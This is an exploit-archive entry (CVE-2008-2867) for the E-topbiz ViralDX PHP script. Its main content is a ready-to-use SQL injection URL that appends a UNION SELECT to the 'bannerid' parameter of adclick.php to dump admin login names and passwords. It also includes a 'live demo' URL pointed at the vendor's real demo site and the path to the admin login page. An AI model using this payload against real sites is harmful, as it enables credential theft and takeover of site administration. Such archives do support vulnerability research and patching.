E-topbiz ViralDX 2.07 - 'bannerid' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2008-06-23  
date_updated: 2016-12-09  
verified: 1  
codes: OSVDB-46504;CVE-2008-2867  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5929.txt  

#########################################################
#
#   Viral DX 1  SQL Injection Vulnerability
#========================================================
#
#    Author: Hussin X
#
#    Home :  www.tryag.cc/cc
#
#    email:  darkangel_g85[at]Yahoo[DoT]com
#            hussin.x[at]hotmail[DoT]com
#
#========================================================
#    HomE script : http://e-topbiz.com/
#
#    Demo : http://e-topbiz.com/trafficdemos/viraldx1/
#
#
##########################################################

Exploit:

http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws

(0x3a,login,pass)+from+pass--



L!VE DEMO:

http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-

1+union+select+concat_ws(0x3a,login,pass)+from+pass--


LoGiN :

/admin/login.php


################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #
#                 Silic0n  / Rafi / FAHD / Iraqihack                           #
#                                                                              #
#################################(and All IRAQIs)###############################

# milw0rm.com [2008-06-24]